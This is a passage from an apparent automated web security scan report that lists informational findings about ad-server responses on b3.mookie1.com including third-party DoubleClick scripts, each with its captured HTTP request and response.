Date: Sat, 29 Jan 2011 05:20:58 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2667
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5145525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/60124
...[SNIP]...
RGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/601242357/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=601242357?">
\n');
document.write ('</SCRIPT>
...[SNIP]...

18.54. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/14152680175@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/14152680175@x90

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/14152680175@x90?http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=44637896=_4d436f07,4152680175,766159^950190^1183^0,1_/xsxdata=$XSXDATA/bnum=44637896/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; session=1296256112|1296264723

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:57:01 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3189
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=44637896=_4d436f07
...[SNIP]...
RGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=44637896=_4d436f07,4152680175,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=44637896/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/806261365/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=806261365?">
\n');
document.write ('</SCRIPT>
...[SNIP]...

18.55. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/14171843173@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/14171843173@x90

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/14171843173@x90?http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=35886031=_4d4387c7,4171843173,766159^950190^1183^0,1_/xsxdata=$XSXDATA/bnum=35886031/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09419e2045525d5f4f58455e445a4a423660; session=1296256112|1296270995

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:21:54 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3198
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=35886031=_4d4387c7
...[SNIP]...
RGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=35886031=_4d4387c7,4171843173,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=35886031/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1370845975/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1370845975?">
\n');
document.write ('</SCRIPT>
...[SNIP]...

18.56. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/15457540452@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/15457540452@x90

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/15457540452@x90?http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=61538420=_4d4374ef,5457540452,766159^950193^1183^0,1_/xsxdata=$XSXDATA/bnum=61538420/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; session=1296256112|1296264969

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:01:21 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3198
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=61538420=_4d4374ef
...[SNIP]...
RGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=61538420=_4d4374ef,5457540452,766159_950193_1183_0,1_/xsxdata=$XSXDATA/bnum=61538420/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1624211567/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1624211567?">
\n');
document.write ('</SCRIPT>
...[SNIP]...

18.57. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/15563376530@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/15563376530@x90

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/15563376530@x90 HTTP/1.1
Host: b3.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:20:56 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2676
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2045525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/14837
...[SNIP]...
RGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1483738409/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1483738409?">
\n');
document.write ('</SCRIPT>
...[SNIP]...

18.58. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/15563376530@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/15563376530@x90

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/15563376530@x90?http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=38526334=_4d435ae2,5563376530,766159^950190^1183^0,1_/xsxdata=$XSXDATA/bnum=38526334/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660; session=1296256112|1296259319

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:57:01 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3189
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e6f45525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=38526334=_4d435ae2
...[SNIP]...
RGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=38526334=_4d435ae2,5563376530,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=38526334/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/118917393/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=118917393?">
\n');
document.write ('</SCRIPT>
...[SNIP]...

18.59. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/15563376530@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/15563376530@x90

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/15563376530@x90?http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=38526334=_4d435ae2,5563376530,766159^950190^1183^0,1_/xsxdata=$XSXDATA/bnum=38526334/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660; session=1296256112|1296259319

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 00:10:10 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3189
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=38526334=_4d435ae2
...[SNIP]...
RGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=38526334=_4d435ae2,5563376530,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=38526334/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/394936567/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=394936567?">
\n');
document.write ('</SCRIPT>
...[SNIP]...

18.60. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/15741228112@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/15741228112@x90

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/15741228112@x90?http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=16203302=_4d4383bd,5741228112,766159^950190^1183^0,1_/xsxdata=$XSXDATA/bnum=16203302/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09419e2045525d5f4f58455e445a4a423660; session=1296256112|1296269957

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:04:37 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3198
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=16203302=_4d4383bd
...[SNIP]...
RGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=16203302=_4d4383bd,5741228112,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=16203302/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1326230958/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1326230958?">
\n');
document.write ('</SCRIPT>
...[SNIP]...

18.61. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/16224341745@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/16224341745@x90

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/16224341745@x90?http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=94855831=_4d436e11,6224341745,766159^950190^1183^0,1_/xsxdata=$XSXDATA/bnum=94855831/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09419e5145525d5f4f58455e445a4a423660; session=1296256112|1296263988

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:57:02 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3198
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2245525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=94855831=_4d436e11
...[SNIP]...
RGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=94855831=_4d436e11,6224341745,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=94855831/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1781742657/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1781742657?">
\n');
document.write ('</SCRIPT>
...[SNIP]...

18.62. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/16224341745@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/16224341745@x90

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/16224341745@x90?http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=94855831=_4d436e11,6224341745,766159^950190^1183^0,1_/xsxdata=$XSXDATA/bnum=94855831/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09419e5145525d5f4f58455e445a4a423660; session=1296256112|1296263988

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:32:01 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3198
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=94855831=_4d436e11
...[SNIP]...
RGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=94855831=_4d436e11,6224341745,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=94855831/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1170717655/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1170717655?">
\n');
document.write ('</SCRIPT>
...[SNIP]...

18.63. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/16224341745@x90

Summary

Severity:   Information
